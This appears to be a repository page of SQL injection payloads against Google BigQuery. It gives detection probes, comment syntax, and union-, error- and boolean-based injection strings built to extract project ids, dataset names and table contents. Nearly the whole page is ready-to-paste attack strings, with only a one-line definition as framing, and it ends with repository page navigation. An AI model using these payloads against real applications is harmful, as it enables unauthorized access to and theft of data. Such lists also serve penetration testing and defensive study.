Google BigQuery SQL Injection

Google BigQuery SQL Injection is a type of security vulnerability where an attacker can execute arbitrary SQL queries on a Google BigQuery database by manipulating user inputs that are incorporated into SQL queries without proper sanitization. This can lead to unauthorized data access, data manipulation, or other malicious activities.

Detection

Use a classic single quote to trigger an error: '
Identify BigQuery using backtick notation: SELECT .... FROM `` AS ...

# Gathering project id
select @@project_id

# Gathering all dataset names
select schema_name from INFORMATION_SCHEMA.SCHEMATA

# Gathering data from specific project id & dataset
select * from `project_id.dataset_name.table_name`

BigQuery Comment

select 1#from here it is not working
select 1/*between those it is not working*/

BigQuery Union Based

UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT 'asd'),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
true) GROUP BY column_name LIMIT 1 UNION ALL SELECT (SELECT @@project_id),1,1,1,1,1,1)) AS T1 GROUP BY column_name#
' GROUP BY column_name UNION ALL SELECT column_name,1,1 FROM  (select column_name AS new_name from `project_id.dataset_name.table_name`) AS A GROUP BY column_name#

BigQuery Error Based

# Error based - division by zero
' OR if(1/(length((select('a')))-1)=1,true,false) OR '

# Error based - casting: select CAST(@@project_id AS INT64)
dataset_name.column_name` union all select CAST(@@project_id AS INT64) ORDER BY 1 DESC#

BigQuery Boolean Based

' WHERE SUBSTRING((select column_name from `project_id.dataset_name.table_name` limit 1),1,1)='A'#

BigQuery Time Based

Time based functions does not exist in the BigQuery syntax.

2.9 KiB Raw Blame History

Google BigQuery SQL Injection

Summary

Detection

BigQuery Comment

BigQuery Union Based

BigQuery Error Based

BigQuery Boolean Based

BigQuery Time Based

References

2.9 KiB

Raw Blame History